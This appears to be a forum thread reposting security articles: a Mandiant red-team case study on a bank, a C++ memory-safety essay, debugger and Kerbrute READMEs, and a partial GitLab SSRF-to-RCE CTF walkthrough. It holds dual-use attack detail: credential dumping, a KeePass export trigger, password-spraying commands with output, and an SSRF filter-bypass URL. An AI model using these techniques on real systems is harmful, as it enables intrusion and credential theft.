many more things without Admin Rights Active Directory can be enumerated to retrieve Privileges accounts, Access Rights of all groups using PowerView Attacks on AD PassTheHash: It is a technique used to pass the NTLM hash of a service to the remote server to login rather than plain text password PassTheCache: Passing the cached credentials of Linux/Unix-based systems which are part of the domain to a windows-based machines to gain access to the system Over-Pass-The-Hash: Obtained NTLM hash can be passed to KDC to grab a valid Kerberos ticket and pass it to another system to gain access Maintaining Access in the Domain: DCSync: Requires Domain Admin or Enterprise Admin permission and pull all the password data to sync with another malicious and stay in the domain DCShadow: Allows register a new domain to add new objects into targeted infrastructure There are many more attacks can be performed to compromise the objects in the Enterprise Active Directory infrastructure. I have listed most commonly performed attacks. I have covered the basics of Active Directory and its necessary conventions which are necessary to learn before going for pen testing. In the next article, i will explain these attacks in details with practical scenarios. Image Ref: https://redmondmag.com/articles/2012/02/01/~/media/ECG/redmondmag/Images/2012/02/0212red_Kerberos_Fig1.ashx Sursa: http://blog.securelayer7.net/exploring-exploiting-active-directory-pen-test/
-
- 1
-
-
Finding Weaknesses Before the Attackers Do April 08, 2019 | by Alyssa Rahman, Curtis Antolik M-trends Red Teaming This blog post originally appeared as an article in M-Trends 2019. FireEye Mandiant red team consultants perform objectives-based assessments that emulate real cyber attacks by advanced and nation state attackers across the entire attack lifecycle by blending into environments and observing how employees interact with their workstations and applications. Assessments like this help organizations identify weaknesses in their current detection and response procedures so they can update their existing security programs to better deal with modern threats. A financial services firm engaged a Mandiant red team to evaluate the effectiveness of its information security team’s detection, prevention and response capabilities. The key objectives of this engagement were to accomplish the following actions without detection: Compromise Active Directory (AD): Gain domain administrator privileges within the client’s Microsoft Windows AD environment. Access financial applications: Gain access to applications and servers containing financial transfer data and account management functionality. Bypass RSA Multi-Factor Authentication (MFA): Bypass MFA to access sensitive applications, such as the client’s payment management system. Access ATM environment: Identify and access ATMs in a segmented portion of the internal network. Initial Compromise Based on Mandiant’s investigative experience, social engineering has become the most common and efficient initial attack vector used by advanced attackers. For this engagement, the red team used a phone-based social engineering scenario to circumvent email detection capabilities and avoid the residual evidence that is often left behind by a phishing email. While performing Open-source intelligence (OSINT) reconnaissance of the client’s Internet-facing infrastructure, the red team discovered an Outlook Web App login portal hosted at https://owa.customer.example. The red team registered a look-alike domain (https://owacustomer.example) and cloned the client’s login portal (Figure 1). Figure 1: Cloned Outlook Web Portal After the OWA portal was cloned, the red team identified IT helpdesk and employee phone numbers through further OSINT. Once these phone numbers were gathered, the red team used a publicly available online service to call the employees while spoofing the phone number of the IT helpdesk. Mandiant consultants posed as helpdesk technicians and informed employees that their email inboxes had been migrated to a new company server. To complete the “migration,” the employee would have to log into the cloned OWA portal. To avoid suspicion, employees were immediately redirected to the legitimate OWA portal once they authenticated. Using this campaign, the red team captured credentials from eight employees which could be used to establish a foothold in the client’s internal network. Establishing a Foothold Although the client’s virtual private network (VPN) and Citrix web portals implemented MFA that required users to provide a password and RSA token code, the red team found a singlefactor bring-your-own-device (BYOD) portal (Figure 2). Figure 2: Single factor mobile device management portal Using stolen domain credentials, the red team logged into the BYOD web portal to attempt enrollment of an Android phone for CUSTOMER\user0. While the red team could view user settings, they were unable to add a new device. To bypass this restriction, the consultants downloaded the IBM MaaS360 Android app and logged in via their phone. The device configuration process installed the client’s VPN certificate (Fig. 13), which was automatically imported to the Cisco AnyConnect app—also installed on the phone. Figure 3: Setting up mobile device management After launching the AnyConnect app, the red team confirmed the phone received an IP address on the client’s VPN. Using a generic tethering app from the Google Play store, the red team then tethered a laptop to the phone to access the client’s internal network. Escalating Privileges Once connected to the internal network, the red team used the Windows “runas” command to launch PowerShell as CUSTOMER\user0 and perform a “Kerberoast” attack. Kerberoasting abuses legitimate features of Active Directory to retrieve service accounts’ ticketgranting service (TGS) tickets and brute-force accounts with weak passwords. To perform the attack, the red team queried an Active Directory domain controller for all accounts with a service principal name (SPN). The typical Kerberoast attack would then request a TGS for the SPN of the associated user account. While Kerberos ticket requests are common, the default Kerberoast attack tool generates an increased volume of requests, which is anomalous and could be identified as suspicious. Using a keyword search for terms such as “Admin”, “SVC” and “SQL,” the consultants identified 18 potentially high-value accounts. To avoid detection, the red team retrieved tickets for this targeted subset of accounts and inserted random delays between each request. The Kerberos tickets for these accounts were then uploaded to a Mandiant password-cracking server which successfully brute-forced the passwords of 4 out of 18 accounts within 2.5 hours. The red team then compiled a list of Active Directory group memberships for the cracked accounts, uncovering several groups that followed the naming scheme of {ComputerName}_Administrators. The red team confirmed the accounts possessed local administrator privileges to the specified computers by performing a remote directory listing of \\ {ComputerName}\C$. The red team also executed commands on the system using PowerShell Remoting to gain information about logged on users and running software. After reviewing this data, the red team identified an endpoint detection and response (EDR) agent which had the capability to perform in-memory detections that were likely to identify and alert on the execution of suspicious command line arguments and parent/ child process heuristics associated with credential theft. To avoid detection, the red team created LSASS process memory dumps by using a custom utility executed via WMI. The red team retrieved the LSASS dump files over SMB and extracted cleartext passwords and NTLM hashes using Mimikatz. The red team performed this process on 10 unique systems identified to potentially have active privileged user sessions. From one of these 10 systems, the red team successfully obtained credentials for a member of the Domain Administrators group. With access to this Domain Administrator account, the red team gained full administrative rights for all systems and users in the customer’s domain. This privileged account was then used to focus on accessing several high-priority applications and network segments to demonstrate the risk of such an attack on critical customer assets. Accessing High-Value Objectives For this phase, the client identified their RSA MFA systems, ATM network and high-value financial applications as three critical objectives for the Mandiant red team to target. Targeting Financial Applications The red team began this phase by querying Active Directory data for hostnames related to the objectives and found multiple servers and databases that included references to their key financial application. The red team reviewed the files and documentation on financial application web servers and found an authentication og indicating the following users accessed the financial application: CUSTOMER\user1 CUSTOMER\user2 CUSTOMER\user3 CUSTOMER\user4 The red team navigated to the financial application’s web interface (Figure 4) and found that authentication required an “RSA passcode,” clearly indicating access required an MFA token. Figure 4: Financial application login portal Bypassing Multi-Factor Authentication The red team targeted the client’s RSA MFA implementation by searching network file shares for configuration files and IT documentation. In one file share (Figure 5), the red team discovered software migration log files that revealed the hostnames of three RSA servers. Figure 5: RSA migration logs from \\ CUSTOMER-FS01\ Software Next, the red team focused on identifying the user who installed the RSA authentication module. The red team performed a directory listing of the C:\Users and C:\ data folders of the RSA servers, finding CUSTOMER\ CUSTOMER_ADMIN10 had logged in the same day the RSA agent installer was downloaded. Using these indicators, the red team targeted CUSTOMER\ CUSTOMER_ADMIN10 as a potential RSA administrator. Figure 6: Directory listing output By reviewing user details, the red team identified the CUSTOMER\CUSTOMER_ADMIN10 account was actually the privileged account for the corresponding standard user account CUSTOMER\user103. The red team then used PowerView, an open source PowerShell tool, to identify systems in the environment where CUSTOMER\user103 was or had recently logged in (Figure 7). Figure 7: Running the PowerView Invoke-UserHunter command The red team harvested credentials from the LSASS memory of 10.1.33.133 and successfully obtained the cleartext password for CUSTOMER\user103 (Figure 8). Figure 8: Mimikatz output The red team used the credential for CUSTOMER\user103 to login, without MFA, to the web front-end of the RSA security console with administrative rights (Figure 9). Figure 9: RSA console Many organizations have audit procedures to monitor for the creation of new RSA tokens, so the red team decided the stealthiest approach would be to provision an emergency tokencode. However, since the client was using software tokens, the emergency tokens still required a user’s RSA SecurID PIN. The red team decided to target individual users of the financial application and attempt to discover an RSA PIN stored on their workstation. While the red team knew which users could access the financial application, they did not know the system assigned to each user. To identify these systems, the red team targeted the users through their inboxes. The red team set a malicious Outlook homepage for the financial application user CUSTOMER\user1 through MAPI over HTTP using the Ruler11 utility. This ensured that whenever the user reopened Outlook on their system, a backdoor would launch. Once CUSTOMER\user1 had re-launched Outlook and their workstation was compromised, the red team began enumerating installed programs on the system and identified that the target user used KeePass, a common password vaulting solution. The red team performed an attack against KeePass to retrieve the contents of the file without having the master password by adding a malicious event trigger to the KeePass configuration file (Figure 10). With this trigger, the next time the user opened KeePass a comma-separated values (CSV) file was created with all passwords in the KeePass database, and the red team was able to retrieve the export from the user’s roaming profile. Figure 10: Malicious configuration file One of the entries in the resulting CSV file was login credentials for the financial application, which included not only the application password, but also the user’s RSA SecurID PIN. With this information the red team possessed all the credentials needed to access the financial application. The red team logged into the RSA Security Console as CUSTOMER\user103 and navigated to the user record for CUSTOMER\user1. The red team then generated an online emergency access token (Figure 11). The token was configured so that the next time CUSTOMER\ user1 authenticated with their legitimate RSA SecurID PIN + tokencode, the emergency access code would be disabled. This was done to remain covert and mitigate any impact to the user’s ability to conduct business. Figure 11: Emergency access token The red team then successfully authenticated to the financial application with the emergency access token (Figure 12). Figure 12: Financial application accessed with emergency access token Accessing ATMs The red team’s final objective was to access the ATM environment, located on a separate network segment from the primary corporate domain. First, the red team prepared a list of high-value users by querying the member list of potentially relevant groups such as ATM_ Administrators. The red team then searched all accessible systems for recent logins by these targeted accounts and dumped their passwords from memory. After obtaining a password for ATM administrator CUSTOMER\ADMIN02, the red team logged into the client’s internal Citrix portal to access the employee’s desktop. The red team reviewed the administrator’s documentation and determined the client’s ATMs could be accessed through a server named JUMPHOST01, which connected the corporate and ATM network segments. The red team also found a bookmark saved in Internet Explorer for “ATM Management.” While this link could not be accessed directly from the Citrix desktop, the red team determined it would likely be accessible from JUMPHOST01. The jump server enforced MFA for users attempting to RDP into the system, so the red team used a previously compromised domain administrator account, CUSTOMER\ ADMIN01, to execute a payload on JUMPHOST01 through WMI. WMI does not support MFA, so the red team was able to establish a connection between JUMPHOST01 and the red team’s CnC server, create a SOCKS proxy, and access the ATM Management application without an RSA pin. The red team successfully authenticated to the ATM Management application and could then dispense money, add local administrators, install new software and execute commands with SYSTEM privileges on all ATM machines (Figure 13). Figure 13: Executing commands on ATMs as SYSTEM Takeaways: Multi-Factor Authentication, Password Policy and Account Segmentation Multi-Factor Authentication Mandiant experts have seen a significant uptick in the number of clients securing their VPN or remote access infrastructure with MFA. However, there is frequently a lack of MFA for applications being accessed from within the internal corporate network. Therefore, FireEye recommends that customers enforce MFA for all externally accessible login portals and for any sensitive internal applications. Password Policy During this engagement, the red team compromised four privileged service accounts due to the use of weak passwords which could be quickly brute forced. FireEye recommends that customers enforce strong password practices for all accounts. Customers should enforce a minimum of 20-character passwords for service accounts. When possible, customers should also use Microsoft Managed Service Accounts (MSAs) or enterprise password vaulting solutions to manage privileged users. Account Segmentation Once the red team obtained initial access to the environment, they were able to escalate privileges in the domain quickly due to a lack of account segmentation. FireEye recommends customers follow the “principle of least-privilege” when provisioning accounts. Accounts should be separated by role so normal users, administrative users and domain administrators are all unique accounts even if a single employee needs one of each. Normal user accounts should not be given local administrator access without a documented business requirement. Workstation administrators should not be allowed to log in to servers and vice versa. Finally, domain administrators should only be permitted to log in to domain controllers, and server administrators should not have access to those systems. By segmenting accounts in this way, customers can greatly increase the difficulty of an attacker escalating privileges or moving laterally from a single compromised account. Conclusion As demonstrated in this case study, the Mandiant red team was able to gain a foothold in the client’s environment, obtain full administrative control of the company domain and compromise all critical business applications without any software or operating system exploits. Instead, the red team focused on identifying system misconfigurations, conducting social engineering attacks and using the client’s internal tools and documentation. The red team was able to achieve their objectives due to the configuration of the client’s MFA, service account password policy and account segmentation. Sursa: https://www.fireeye.com/blog/threat-research/2019/04/finding-weaknesses-before-the-attackers-do.html
- 1 reply
-
- 1
-
-
Modern C++ Won't Save Us 2019-04-21 by alex_gaynor I'm a frequent critic of memory unsafe languages, principally C and C++, and how they induce an exceptional number of security vulnerabilities. My conclusion, based on reviewing evidence from numerous large software projects using C and C++, is that we need to be migrating our industry to memory safe by default languages (such as Rust and Swift). One of the responses I frequently receive is that the problem isn't C and C++ themselves, developers are simply holding them wrong. In particular, I often receive defenses of C++ of the form, "C++ is safe if you don't use any of the functionality inherited from C"1 or similarly that if you use modern C++ types and idioms you will be immune from the memory corruption vulnerabilities that plague other projects. I would like to credit C++'s smart pointer types, because they do significantly help. Unfortunately, my experience working on large C++ projects which use modern idioms is that these are not nearly sufficient to stop the flood of vulnerabilities. My goal for the remainder of this post is to highlight a number of completely modern C++ idioms which produce vulnerabilities. Hide the reference use-after-free The first example I'd like to describe, originally from Kostya Serebryany, is how C++'s std::string_view can make it easy to hide use-after-free vulnerabilities: #include <iostream> #include <string> #include <string_view> int main() { std::string s = "Hellooooooooooooooo "; std::string_view sv = s + "World\n"; std::cout << sv; } What's happening here is that s + "World\n" allocates a new std::string, and then is converted to a std::string_view. At this point the temporary std::string is freed, but sv still points at the memory that used to be owned by it. Any future use of sv is a use-after-free vulnerability. Oops! C++ lacks the facilities for the compiler to be aware that sv captures a reference to something where the reference lives longer than the referent. The same issue impacts std::span, also an extremely modern C++ type. Another fun variant involves using C++'s lambda support to hide a reference: #include <memory> #include <iostream> #include <functional> std::function<int(void)> f(std::shared_ptr<int> x) { return [&]() { return *x; }; } int main() { std::function<int(void)> y(nullptr); { std::shared_ptr<int> x(std::make_shared<int>(4)); y = f(x); } std::cout << y() << std::endl; } Here the [&] in f causes the lambda to capture values by reference. Then in main x goes out of scope, destroying the last reference to the data, and causing it to be freed. At this point y contains a dangling pointer. This occurs despite our meticulous use of smart pointers throughout. And yes, people really do write code that handles std::shared_ptr<T>&, often as an attempt to avoid additional increment and decrements on the reference count. std::optional<T> dereference std::optional represents a value that may or may not be present, often replacing magic sentinel values (such as -1 or nullptr). It offers methods such as value(), which extract the T it contains and raises an exception if the the optional is empty. However, it also defines operator* and operator->. These methods also provide access to the underlying T, however they do not check if the optional actually contains a value or not. The following code for example, simply returns an uninitialized value: #include <optional> int f() { std::optional<int> x(std::nullopt); return *x; } If you use std::optional as a replacement for nullptr this can produce even more serious issues! Dereferencing a nullptr gives a segfault (which is not a security issue, except in older kernels). Dereferencing a nullopt however, gives you an uninitialized value as a pointer, which can be a serious security issue. While having a T* with an uninitialized value is also possible, these are much less common than dereferencing a pointer that was correctly initialized to nullptr. And no, this doesn't require you to be using raw pointers. You can get uninitialized/wild pointers with smart pointers as well: #include <optional> #include <memory> std::unique_ptr<int> f() { std::optional<std::unique_ptr<int>> x(std::nullopt); return std::move(*x); } std::span<T> indexing std::span<T> provides an ergonomic way to pass around a reference to a contiguous slice of memory and a length. This lets you easily write code that works over multiple different types; a std::span<uint8_t> can point to memory owned by a std::vector<uint8_t>, a std::array<uint8_t, N>, or even a raw pointer. Failure to correctly check bounds is a frequent source of security vulnerabilities, and in many senses span helps out with this by ensuring you always have a length handy. Like all STL data structures, span's operator[] method does not perform any bounds checks. This is regrettable, since operator[] is the most ergonomic and default way people use data structures. std::vector and std::array can at least theoretically be used safely because they offer an at() method which is bounds checked (in practice I've never seen this done, but you could imagine a project adopting a static analysis tool which simply banned calls to std::vector<T>::operator[]). span does not offer an at() method, or any other method which performs a bounds checked lookup. Interestingly, both Firefox and Chromium's backports of std::span do perform bounds checks in operator[], and thus they'll never be able to safely migrate to std::span. Conclusion Modern C++ idioms introduce many changes which have the potential to improve security: smart pointers better express expected lifetimes, std::span ensures you always have a correct length handy, std::variant provides a safer abstraction for unions. However modern C++ also introduces some incredible new sources of vulnerabilities: lambda capture use-after-free, uninitialized-value optionals, and un-bounds-checked span. My professional experience writing relatively modern C++, and auditing Rust code (including Rust code that makes significant use of unsafe) is that the safety of modern C++ is simply no match for memory safe by default languages like Rust and Swift (or Python and Javascript, though I find it rare in life to have a program that makes sense to write in either Python or C++). There are significant challenges to migrating existing, large, C and C++ codebases to a different language -- no one can deny this. Nonetheless, the question simply must be how we can accomplish it, rather than if we should try. Even with the most modern C++ idioms available, the evidence is clear that, at scale, it's simply not possible to hold C++ right. [1] I understood this to be referring to raw pointers, arrays-as-pointers, manual malloc/free, and other similar features. However I think it's worth acknowledging that given that C++ explicitly incorporated C into its specification, in practice most C++ code incorporates some of these elements. Hi, I'm Alex. I'm currently at a startup called Alloy. Before that I was a engineer working on Firefox security and before that at the U.S. Digital Service. I'm an avid open source contributor and live in Washington, DC. Sursa: https://alexgaynor.net/2019/apr/21/modern-c++-wont-save-us/
-
- 1
-
-
Debugger for .NET Core runtime The debugger provides GDB/MI or VSCode Debug Adapter protocol and allows to debug .NET apps under .NET Core runtime. Build Switch to netcoredbg directory, create build directory and switch into it: mkdir build cd build Proceed to build with cmake. Necessary dependencies (CoreCLR sources and .NET SDK binaries) are going to be downloaded during CMake configure step. It is possible to override them with CMake options -DCORECLR_DIR=<path-to-coreclr> and -DDOTNET_DIR=<path-to-dotnet-sdk>. Ubuntu CC=clang CXX=clang++ cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin macOS cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin Windows cmake .. -G "Visual Studio 15 2017 Win64" -DCMAKE_INSTALL_PREFIX="$pwd\..\bin" Compile and install: cmake --build . --target install Run The above commands create bin directory with netcoredbg binary and additional libraries. Now running the debugger with --help option should look like this: $ ../bin/netcoredbg --help .NET Core debugger Options: --attach <process-id> Attach the debugger to the specified process id. --interpreter=mi Puts the debugger into MI mode. --interpreter=vscode Puts the debugger into VS Code Debugger mode. --engineLogging[=<path to log file>] Enable logging to VsDbg-UI or file for the engine. Only supported by the VsCode interpreter. --server[=port_num] Start the debugger listening for requests on the specified TCP/IP port instead of stdin/out. If port is not specified TCP 4711 will be used. Sursa: https://github.com/Samsung/netcoredbg
-
- 1
-
-
Kerbrute A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication Grab the latest binaries from the releases page to get started. Background This tool grew out of some bash scripts I wrote a few years ago to perform bruteforcing using the Heimdal Kerberos client from Linux. I wanted something that didn't require privileges to install a Kerberos client, and when I found the amazing pure Go implementation of Kerberos gokrb5, I decided to finally learn Go and write this. Bruteforcing Windows passwords with Kerberos is much faster than any other approach I know of, and potentially stealthier since pre-authentication failures do not trigger that "traditional" An account failed to log on event 4625. With Kerberos, you can validate a username or test a login by only sending one UDP frame to the KDC (Domain Controller) For more background and information, check out my Troopers 2019 talk, Fun with LDAP and Kerberos (link TBD) Usage Kerbrute has three main commands: bruteuser - Bruteforce a single user's password from a wordlist passwordspray - Test a single password against a list of users usernenum - Enumerate valid domain usernames via Kerberos A domain (-d) or a domain controller (--dc) must be specified. If a Domain Controller is not given the KDC will be looked up via DNS. By default, Kerbrute is multithreaded and uses 10 threads. This can be changed with the -t option. Output is logged to stdout, but a log file can be specified with -o. By default, failures are not logged, but that can be changed with -v. Lastly, Kerbrute has a --safe option. When this option is enabled, if an account comes back as locked out, it will abort all threads to stop locking out any other accounts. The help command can be used for more information $ ./kerbrute __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.0 (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication. It is designed to be used on an internal Windows domain with access to one of the Domain Controllers. Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts Usage: kerbrute [command] Available Commands: bruteuser Bruteforce a single user's password from a wordlist help Help about any command passwordspray Test a single password against a list of users userenum Enumerate valid domain usernames via Kerberos version Display version info and quit Flags: --dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS -d, --domain string The full domain to use (e.g. contoso.com) -h, --help help for kerbrute -o, --output string File to write logs to. Optional. --safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE -t, --threads int Threads to use (default 10) -v, --verbose Log failures and errors Use "kerbrute [command] --help" for more information about a command. User Enumeration To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures so it will not lock out any accounts. This generates a Windows event ID 4768 if Kerberos logging is enabled. root@kali:~# ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop 2019/03/06 21:28:04 > Using KDC(s): 2019/03/06 21:28:04 > pdc01.lab.ropnop.com:88 2019/03/06 21:28:04 > [+] VALID USERNAME: amata@lab.ropnop.com 2019/03/06 21:28:04 > [+] VALID USERNAME: thoffman@lab.ropnop.com 2019/03/06 21:28:04 > Done! Tested 1001 usernames (2 valid) in 0.425 seconds Password Spray With passwordwpray, Kerbrute will perform a horizontal brute force attack against a list of domain users. This is useful for testing one or two common passwords when you have a large list of users. WARNING: this does will increment the failed login count and lock out accounts. This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed root@kali:~# ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop 2019/03/06 21:37:29 > Using KDC(s): 2019/03/06 21:37:29 > pdc01.lab.ropnop.com:88 2019/03/06 21:37:35 > [+] VALID LOGIN: callen@lab.ropnop.com:Password123 2019/03/06 21:37:37 > [+] VALID LOGIN: eshort@lab.ropnop.com:Password123 2019/03/06 21:37:37 > Done! Tested 2755 logins (2 successes) in 7.674 seconds Brute User This is a traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy! This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed root@kali:~# ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop 2019/03/06 21:38:24 > Using KDC(s): 2019/03/06 21:38:24 > pdc01.lab.ropnop.com:88 2019/03/06 21:38:27 > [+] VALID LOGIN: thoffman@lab.ropnop.com:Summer2017 2019/03/06 21:38:27 > Done! Tested 1001 logins (1 successes) in 2.711 seconds Installing You can download pre-compiled binaries for Linux, Windows and Mac from the releases page. If you want to live on the edge, you can also install with Go: $ go get github.com/ropnop/kerbrute With the repository cloned, you can also use the Make file to compile for common architectures: $ make help help: Show this help. windows: Make Windows x86 and x64 Binaries linux: Make Linux x86 and x64 Binaries mac: Make Darwin (Mac) x86 and x64 Binaries clean: Delete any binaries all: Make Windows, Linux and Mac x86/x64 Binaries $ make all Done. Building for windows amd64.. Building for windows 386.. Done. Building for linux amd64... Building for linux 386... Done. Building for mac amd64... Building for mac 386... Done. $ ls dist/ kerbrute_darwin_386 kerbrute_linux_386 kerbrute_windows_386.exe kerbrute_darwin_amd64 kerbrute_linux_amd64 kerbrute_windows_amd64.exe Credits Huge shoutout to jcmturner for his pure Go implemntation of KRB5: https://github.com/jcmturner/gokrb5 . An amazing project and very well documented. Couldn't have done any of this without that project. Sursa: https://github.com/ropnop/kerbrute
-
GitLab 11.4.7 Remote Code Execution 21 Apr 2019 Capture The FlagWeb HackingExploit Walkthrough TL;DR SSRF targeting redis for RCE via IPv6/IPv4 address embedding chained with CLRF injection in the git:// protocol. Video watch on YouTube Introduction At the Real World CTF, we came across an interesting web challenge called flaglab. The description said: "You might need a 0day" there was a link to the challenge, and there was a download link for a docker-compose.yml file. Upon visiting the challenge site, we are greeted by a GitLab instance. The docker-compose.yml file can be used to set up a local version of this very instance. Inside the docker-compose.yml, the docker image is set to gitlab/gitlab-ce:11.4.7-ce.0. Upon doing a google search on the gitlab version, we stumbled upon a blog post on GitLab Patch Release, and it seemed like it was the latest version - the blog post was created on Nov 21, 2018 and the CTF was happening on Dec 1, 2018. So we thought we would never find an 0day in GitLab due to its huge codebase and it's just a waste of time... But as it turns out, we were wrong on these assumptions. During a post CTF dinner with other teams, some people from RPISEC told us that it was not the latest version - there was a newer version 11.4.8 and the commit history of the newer version reveals several security patches. One of the bugs was a "SSRF in Webhooks" and it was reported by nyangawa of Chaitin Tech (which is also the company that organized the Real World CTF). Knowing all this, it was aactually a fairly simple challenge, and I was mad because we gave up without doing enough research. So after the event, I tried to solve this challenge from the knowledge gained so far. Setup Let's start setting up a local copy of the vulnerable version of GitLab. We can start by looking at the docker-compose.yml file. web: image: 'gitlab/gitlab-ce:11.4.7-ce.0' restart: always hostname: 'gitlab.example.com' environment: GITLAB_OMNIBUS_CONFIG: | external_url 'http://gitlab.example.com' redis['bind']='127.0.0.1' redis['port']=6379 gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password') ports: - '5080:80' - '50443:443' - '5022:22' volumes: - './srv/gitlab/config:/etc/gitlab' - './srv/gitlab/logs:/var/log/gitlab' - './srv/gitlab/data:/var/opt/gitlab' - './steg0_initial_root_password:/steg0_initial_root_password' - './flag:/flag:ro' From the above YAML file, the following conclusions can be made: The docker image used is GitLab Community Edition 11.4.7 gitlab-ce:11.4.7-ce.0. Redis server runs on port 6379 and it is listening to localhost. The rails initial_root_password is set using a file called steg0_initial_root_password There are some ports mapped from the docker container to our machine, which exposes the application outside the container for us to fiddle with. We'll be using the HTTP service running on port 5080. Additionally, there are volumes, which mounts the local files and folders inside the docker container. For example, ./srv/gitlab/logs on our machine will be mounted to /var/log/gitlab inside the docker container. The password file and the flag is also copied into the container. You can create these required files and folders using the following commands: # Create required folders for the gitlab logs, data and configs. leave it empty mkdir -p ./srv/gitlab/config ./srv/gitlab/data ./srv/gitlab/logs # Create a random password using python python3 -c "import secrets; print(secrets.token_urlsafe(16))" > ./steg0_initial_root_password # ==OR== # Choose your own password echo "my_sup3r_s3cr3t_p455w0rd_4ef5a2e1" > ./steg0_initial_root_password # Create a test flag echo "RWCTF{this_is_flaglab_flag}" > ./flag Now that we have the required files and folders, we can start the docker container using the following command. $ docker-compose up The process of downloading the base image and building the gitlab instance might take a few minutes. After you start seeing some logs, you should be able to browse to http://127.0.0.1:5080/ for the vulnerable GitLab version. Now it's time to configure the chrome browser to use a proxy. You can do it manually by going to the settings and changing it there, or you can do it via the command-line which is a bit handier. /path/to/chrome --proxy-server="127.0.0.1:8080" --profile-directory=Proxy --proxy-bypass-list="" I had problems with the Burp Suite proxy not being able to intercept the localhost requests even with the bypass list being empty. So a quick workaround was to add an entry in the hosts file like the following. 127.0.0.1 localhost.com Browsing to http://localhost.com:5080 now lets us access GitLab through the Burp Suite proxy. That's all for the setup! The Bugs As you already know, we thought that 11.4.7 was the latest version of GitLab at that time, but in fact, there was a newer version 11.4.8 which had many security patches in the commits. One of the bugs was related to SSRF and it even referenced to Chaitin Tech, which is the company responsible for hosting the Real World CTF. Additionally we also know that the flag file is located in the /(root of the file system), so we need an Arbitrary File Read or a Remote Code Execution vulnerability. Now let's have a look at those patches for SSRF and other potential bugs. At the top, you'll find 3 security related commits. There's our SSRF in Webhooks, we also have an XSS, but it's rather not that interesting for us, and finally, we have a CRLF injection (Carriage-Return/Line-Feed) which is basically newline injections. If we look at the fix for the SSRF issue and scroll down a bit, you'll see that there are unit tests to confirm the fix for the issue. These tests tell us how to exploit the bug, which is exactly what we wanted. Looking at some test cases, apparently, special IPv6 addresses which have an IPv4 address embedded inside them can bypass the SSRF checks. # SSRF protection Bypass https://[0:0:0:0:0:ffff:127.0.0.1] The other issue was a CRLF vulnerability in Project hooks, scrolling down to test cases you can see it's merely URLs with newlines. Either it's URL encoded, or simply they are just regular newlines. Now the question is, can these bugs help us in exploiting GitLab to get the flag? Yes, they can. By chaining these 2 bugs, we can get a Remote Code Execution. It's actually a typical security issue. Basically, an SSRF or Server Side Request Forgery is used to target the local internal Redis database, which is used extensively for different types of workers. So if you can push a malicious worker, you might end up with a Remote Code Execution vulnerability. In fact, GitLab has been exploited like this several times before, and there are many bug bounty writeups which are similar to this. I don't remember where I first came acorss this technique, but I believe it's @Agarri_FR back in 2015, tweeted about this and also there was a blog post by him from 2014. I did come across many bug bug bounty writeups, so everyone who's into web security should know about this. Exploitation Now onto the fun stuff, first, let's see if we can trigger an SSRF somewhere. At first, I thought about targeting the Webhooks (used to send requests to a URL whenever any events are fired in the repository) like it's mentioned here. However, when I clicked on the create a new project, I saw multiple ways to import a project and one of them was Repo by URL, which would basically fetch the repo when you specify a URL. We can import a repo over http://, https:// and git://. So to test this, we can try to import the repo using the following URL. http://127.0.0.1/test/somerepo.git But we'd get the error that "Import URL is blocked: Requests to localhost are not allowed". Now, we can try the bypass using the special IPv6 address. So if we replace the import URL to the following. http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git Before importing using this URL, we need a server to listen on port 1234 to confirm the SSRF. To do that, we can get a root shell on the docker container to install netcat and then listen on port 1234 to see if the SSRF is triggered. First, let's go ahead and list out all the running Docker containers to know which one to get a shell on. # get a list of running docker containers $ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS NAMES bd9daf8c07a6 gitlab/gitlab-ce:11.4.7-ce.0 ... ... ... ... We just have one running, and it's the GitLab 11.4.7. We can get a shell on the container using the following command by specifying a container ID. $ docker exec -i -t bd9daf8c07a6 "/bin/bash" Here, bd9daf8c07a6 is the container ID. -i means interaction with /bin/bash. -t means create tty - a pseudo terminal for the interaction. Now that we have the shell, we can install netcat so that we can set up a simple server to listen for incoming SSRF requests. root@gitlab:~ apt update && apt install -y netcat Setting up a raw TCP server is simple as the following command. root@gitlab:~ nc -lvp 1234 Here, -l is to tell netcat that we have to "listen". -v is for verbose output. -p is to specift the port number on which the server has to bind on. Now that we have our SSRF testing setup done let's make the same import request to see if we can trigger the 